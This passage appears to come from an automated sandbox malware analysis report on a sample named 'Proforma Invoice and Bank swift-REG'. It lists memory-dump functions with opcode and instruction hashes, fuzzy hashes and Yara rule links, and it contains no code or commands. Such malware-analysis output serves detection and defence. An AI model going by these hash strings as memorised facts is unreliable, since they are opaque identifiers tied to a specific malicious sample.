Opcode Fuzzy Hash: 6cb904c2f1f7cca6234307e6ad3115b395ff13988f72577c204d24ba9d26fcae
Instruction Fuzzy Hash: 09E02272A02421ABC2114B08BC81FA6B3EDDBD9B10F090076F508C7214EA68ED01C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEF358, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 7d78087170580e8b8690738cf8ef4ec22095d32f78445a7e8e748b612642fd99
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: FBE0D832A40158BFCB2196D99E06FAABBACDB44B60F0001E6B904DB190D5719D40C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00AFFF60, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcf07057af2b21bf4eec210db98e4a1bcedd65c5b2b16cebdbccb975daf29a5
Instruction ID: b06561e84fb60893d95773c7c090d327591d1b1d3113714e7c66a954f54885fb
Opcode Fuzzy Hash: 5fcf07057af2b21bf4eec210db98e4a1bcedd65c5b2b16cebdbccb975daf29a5
Instruction Fuzzy Hash: 3CE0DFB020520C9FD734DF92D880F353BAC9F52721F1A846DF20A4B102C621DC80C306

Uniqueness

Uniqueness Score: -1.00%

Function 00B741E8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad36f8b2d3cf65562db75f4b3c7f497528096570c202248a79f27b52575ecacf
Instruction ID: ca65117dc1cda71998a88d708c09650a799d9e29b0549ceaedf9720424329d45
Opcode Fuzzy Hash: ad36f8b2d3cf65562db75f4b3c7f497528096570c202248a79f27b52575ecacf
Instruction Fuzzy Hash: 45F01C75522701EECB62EFA9E921714B7E4F744713F2081ABA114872A5EF344C44CF02

Uniqueness

Uniqueness Score: -1.00%

Function 00B9D380, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: bef21e85d06e570cbe40fd1ccd03059ffc43083623977a945047a83fb71d2162
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 8CE0C231288244FBDF225E45CC01F79BB96DB507A1F204071FE085A692CA75AC91E6C8

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0412c2fa8f38524e56de25b73159e3eb350bef777ee16e775fdf1ef7ecd3051
Instruction ID: eec4dbb7f3099ef52ac5e78d6419dcd8560c677093ee2dca4182fe30ba961992
Opcode Fuzzy Hash: d0412c2fa8f38524e56de25b73159e3eb350bef777ee16e775fdf1ef7ecd3051
Instruction Fuzzy Hash: ADD02B2256204426CB1C23008C64B6163D2E784710F3004EFF1030B6E2FD60ACE0910A

Uniqueness

Uniqueness Score: -1.00%

Function 00406A96, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8baea04733d676cc439c9b2eeb8cd06284bbeedd16c475103ee528169d76e87f
Instruction ID: e8b0955016ba7d5a2e1c9f9616509bcf3d1c9366e2a6658d5100c9722e3fbcf0
Opcode Fuzzy Hash: 8baea04733d676cc439c9b2eeb8cd06284bbeedd16c475103ee528169d76e87f
Instruction Fuzzy Hash: 59C0123295D11509CB158C09FC809A5F325E757220F102362EC14671909292C4A181C8

Uniqueness

Uniqueness Score: -1.00%

Function 00B116E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a511ba1ed612eb49240c9a9cf284f79d27c3669b559b3c25eb7a86c4b1d96adc
Instruction ID: c5efc4d0cc3140eb6e37c3a7ddacc7a1a6749012c1cc6c7ffb6fc8ca97b7c344
Opcode Fuzzy Hash: a511ba1ed612eb49240c9a9cf284f79d27c3669b559b3c25eb7a86c4b1d96adc
Instruction Fuzzy Hash: CED0A77120010192DA2D5B189815B5422D1DB80785F7804ECF307495C2DFB2CCD2E048

Uniqueness

Uniqueness Score: -1.00%

Function 00B653CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 3688aa3d7abf8202582cbe15070da3bca7e57adf0f85be1b0dfb281a8945daab
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 7CE0EC71A44A849BCF22DB99CA50F5EB7F5FB44B80F150494B4095F762C668AD10CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041583E, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33191d0887b53a422219a79a6bfa8f8c147d96dc8808c8d6e0f81464de07c22
Instruction ID: 7ae52c9c1e85ead99a5e5a52a1b45c0d898be3741b2f18a4a65971b0cf1bd58a
Opcode Fuzzy Hash: d33191d0887b53a422219a79a6bfa8f8c147d96dc8808c8d6e0f81464de07c22
Instruction Fuzzy Hash: 57B01237F061000685006C55B5101B8F3B5D48323FB10B677D608F30109A12C011468C

Uniqueness

Uniqueness Score: -1.00%

Function 00AFAAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 696f49ac66fdc46b10680c3c56e92182877989b7c1c387c8e2195aeea0d96bbe
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 83D0C935352980CFD717DB0CC554B1533A4FB04B80FC504D0E500CB761E62CDD44CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00B135A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 7f124531893495fc304a73f77aa1adf931d2c76fa773aeec49eb22335c9ef0e4
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 47D0A9315011849EDB01EB50C2187E837F3FB20F08FE820E5E0024686AE33E4F8AD600

Uniqueness

Uniqueness Score: -1.00%

Function 00AEDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 0af200e17f8394c40022896d2d2543c7620e2047aea52bf14fa3b19a2f08e09c
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 76C08C70290A40AAEB222F20CE02B003AA1BB01B01F4504E07300DA0F0EB79DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: ee7f17a94275336eb9c95b4a7ba6c085006e1bce8c82f11ee30441e73a40484b
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 48C01232080648BBCB126E81CC01F067F6AEB94B60F008010BA480A5B18A32EAB0EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00B03A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 0a54d2dfcfeabb609f7a6fdab07bd1fa7c7fdbdbc6e0af0bf93c19b22b0d1c28
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 04C08C32080648BBC7126E41DD01F017F69E790B60F000060B7040A5A18632EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 00AEAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 73ecf2742af359425377d930f6e964c086ba7f916bed9a38f00cfb4b69b68468
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 73C08C320C0248BBC7126A45CD01F01BF69E790BA0F000020B6040A6A28932EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 00AF76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 21a3a54db6b52777c82c84556fbfdc76d534e1982f1176f4af7bd1607961d1d9
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: A5C08C701899885AEB2A5748CE21B383A90AB08708F4805ACBB01894E2D368BC02C288

Uniqueness

Uniqueness Score: -1.00%

Function 00B136CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: c8336325be686742af496496b133fa0d20f7318ea72df911cfcb4a9a18f4f8a2
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 0AC08CB0154840BAD6156B208E01B1472D4E700B21FA402E47220454E0E6299C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 00B07D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 115d6adf662fc21ac9624e6085739b756a66c264a2466ebda656268288e1ef70
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: ACB092343419408FCE16DF18C080B1573E4FB44B40B8400E0E400CBA20D629E9008900

Uniqueness

Uniqueness Score: -1.00%

Function 00B12ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: bcc606ca2c00f0d4aff89f33677b876a343a85e9b13cecfc37b2b288f8fcf41d
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 3BB01232D10444CFCF02EF80C710B297332FB00790F058490B10167931C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B298A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fa73757f9abdc7c1c1041f2044802e713fc347f9f2ff143dfb36d6d0bd3df8
Instruction ID: fdc5175ee227b5b8eb99f52f5a5c0fbb9f661dd65f5fe6f6aaba59beffc1bd51
Opcode Fuzzy Hash: 03fa73757f9abdc7c1c1041f2044802e713fc347f9f2ff143dfb36d6d0bd3df8
Instruction Fuzzy Hash: 1990026231100402D202615D54146061049D7D1386FE1D066E1414555D86658973F172

Uniqueness

Uniqueness Score: -1.00%

Function 00B29820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78d26041c9dca2345cc076566ca07f27bdbdf7882aa8f57d09c96b28cdec059
Instruction ID: f3dc5fb0dea96b3c20dd1ed7227dffdb17a5217d6ab3c6384ed33e7413414fcc
Opcode Fuzzy Hash: f78d26041c9dca2345cc076566ca07f27bdbdf7882aa8f57d09c96b28cdec059
Instruction Fuzzy Hash: C990027225100402D241715D54046061049E7D0382FE1D066A0414554E86958A76FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070b04ec2c5a885917b806b2197848ff82e4cc6ea99f1e6f864eb10376fb8714
Instruction ID: 2a46935daadb0a44bc358529dafe3c524d052bf3fc8901a58653ebb86825367c
Opcode Fuzzy Hash: 070b04ec2c5a885917b806b2197848ff82e4cc6ea99f1e6f864eb10376fb8714
Instruction Fuzzy Hash: 5B9002A2611140434640B15D58044066055E7E13427E1D175A0444560C86A88875E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B299D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2b4ea9f24ab73a6322080f5b3a3de9720ee153c7d3819183dfae36b6925fa2
Instruction ID: 2dfe2d90074164f2b40ab9c5d34eaa1c175b9c25acb011eadaae12db975c6dfa
Opcode Fuzzy Hash: fb2b4ea9f24ab73a6322080f5b3a3de9720ee153c7d3819183dfae36b6925fa2
Instruction Fuzzy Hash: 429002A222100042D204615D54047061085D7E1342FA1D066A2144554CC5698C71A165

Uniqueness

Uniqueness Score: -1.00%

Function 00B29950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e84f72ca5cfaae1c1129ef31e0e39d465a7731fbd51733624a95d4a3d309a6e
Instruction ID: 6db5ea95d7f90f54b752a43d97b26417777ffaf183b87794fda27727f2f71ccc
Opcode Fuzzy Hash: 0e84f72ca5cfaae1c1129ef31e0e39d465a7731fbd51733624a95d4a3d309a6e
Instruction Fuzzy Hash: 359002A221140403D240655D58046071045D7D0343FA1D065A2054555E8A698C71B175

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86546a488814f82c44e1f1481e93f1095c757aa6b6e3070345b5f27aa789c324
Instruction ID: 29e53234eb970081e8f7d0482ffa73ede49c3fc4bfe50d24e853d9566d17a8f8
Opcode Fuzzy Hash: 86546a488814f82c44e1f1481e93f1095c757aa6b6e3070345b5f27aa789c324
Instruction Fuzzy Hash: FA90026221144442D240625D5804B0F5145D7E1343FE1D06DA4146554CC9558875A761

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a220f1d1f7c04c5903b7c90f37512bc3099b00e85eaa65276eee051db226408
Instruction ID: e13ce6e3b67022280393047771baefd29002567b8c4947ad6cc7f518622b9ad4
Opcode Fuzzy Hash: 0a220f1d1f7c04c5903b7c90f37512bc3099b00e85eaa65276eee051db226408
Instruction Fuzzy Hash: 4A90027221140402D200615D58087471045D7D0343FA1D065A5154555E86A5C8B1B571

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5cdba88bb7931d18445a29a5a26a32e88b6bc44f5669bad04a683915f7c2d20
Instruction ID: 0e3885523b886b7060d955ec0ab2aad38b759acc3e3a2a5a6b71e625ae6d01eb
Opcode Fuzzy Hash: f5cdba88bb7931d18445a29a5a26a32e88b6bc44f5669bad04a683915f7c2d20
Instruction Fuzzy Hash: AE90027221144002D240715D944460B6045E7E0342FA1D465E0415554C86558876E261

Uniqueness

Uniqueness Score: -1.00%

Function 00B29B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed2f533ec8e74beefa077f63d0b04c47706275dcbb85f6b1022144df637b3d6
Instruction ID: 1c9681020e6cc72f72f69fdbab685a939b2150888684cebb50406e4e43b382c6
Opcode Fuzzy Hash: 2ed2f533ec8e74beefa077f63d0b04c47706275dcbb85f6b1022144df637b3d6
Instruction Fuzzy Hash: DB90026225100802D240715D94147071046D7D0742FA1D065A0014554D86568975B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B295F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a367abfcfb86e2a9a9cf8de4db2c82200056c709ad39e9c3a9a413e637b516a0
Instruction ID: 7688edb45767931cdb685e45452aefdf57166a4a849479f9cad44f4476db935e
Opcode Fuzzy Hash: a367abfcfb86e2a9a9cf8de4db2c82200056c709ad39e9c3a9a413e637b516a0
Instruction Fuzzy Hash: DF90027221100802D204615D58046861045D7D0342FA1D065A6014655E96A588B1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00B2AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7107a8b901dce0a9b150838ec8a66a0e7b3fdd2612d7d31462bf20dc82410f6
Instruction ID: 0e7c25756f342fb0c6a3c02989ce34d596b2794e6d168795bb12758b2db34fc2
Opcode Fuzzy Hash: e7107a8b901dce0a9b150838ec8a66a0e7b3fdd2612d7d31462bf20dc82410f6
Instruction Fuzzy Hash: F8900272A15000129240715D58146465046E7E0782FA5D065A0504554C89948A75A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B29520, Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474c9861533841ee15409bf3ec3a3edf7d01a5976fc4a714885e53792c567bed
Instruction ID: 68913a30084e28d24b4f8002d3bb9c2d6082358b5c5640351325cc3013173b1e
Opcode Fuzzy Hash: 474c9861533841ee15409bf3ec3a3edf7d01a5976fc4a714885e53792c567bed
Instruction Fuzzy Hash: DB9002E2211140924600A25D9404B0A5545D7E0342FA1D06AE1044560CC5658871E175

Uniqueness

Uniqueness Score: -1.00%

Function 00B29560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858342ee271ec04b5b1f6cc0885d53141320f911e67323d82b9a849c36e621da
Instruction ID: d13c01b979601eab0523c7b15023dfe4cd4a795de558ee26d385c026a5834d11
Opcode Fuzzy Hash: 858342ee271ec04b5b1f6cc0885d53141320f911e67323d82b9a849c36e621da
Instruction Fuzzy Hash: DA900266231000020245A55D160450B1485E7D63927E1D069F1406590CC6618875A361

Uniqueness

Uniqueness Score: -1.00%

Function 00B296D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8f4e2bbbaf450a8de878df512aed5d131ee96be06ac28d2f99054ba5224420e
Instruction ID: 5e69f60f112b6da74192d4480f67ec9ef66b8f0502203bcc0c5bbdbe831814a0
Opcode Fuzzy Hash: b8f4e2bbbaf450a8de878df512aed5d131ee96be06ac28d2f99054ba5224420e
Instruction Fuzzy Hash: 7290027221100842D200615D5404B461045D7E0342FA1D06AA0114654D8655C871B561

Uniqueness

Uniqueness Score: -1.00%

Function 00B29610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38d2d2c56d38cb357f3a5479d32278887fb78313134e284d1f935d0ff44c6163
Instruction ID: 653951ca67ed6c54c0aeddf91fc7b3e874b7a4e4f8be2500fd71d8957ae0e534
Opcode Fuzzy Hash: 38d2d2c56d38cb357f3a5479d32278887fb78313134e284d1f935d0ff44c6163
Instruction Fuzzy Hash: 8590027261500802D250715D54147461045D7D0342FA1D065A0014654D87958A75B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B29650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe7136a52ba69a164b17993c1c94d743bb812c51ee855732a1f54afa736fb91
Instruction ID: ddeccbf32761c2d87012e625e329d53dc6fd25a30e66f1f8a58658a5bb2dadbc
Opcode Fuzzy Hash: 2fe7136a52ba69a164b17993c1c94d743bb812c51ee855732a1f54afa736fb91
Instruction Fuzzy Hash: A990027221504842D240715D5404A461055D7D0346FA1D065A0054694D96658D75F6A1

Uniqueness

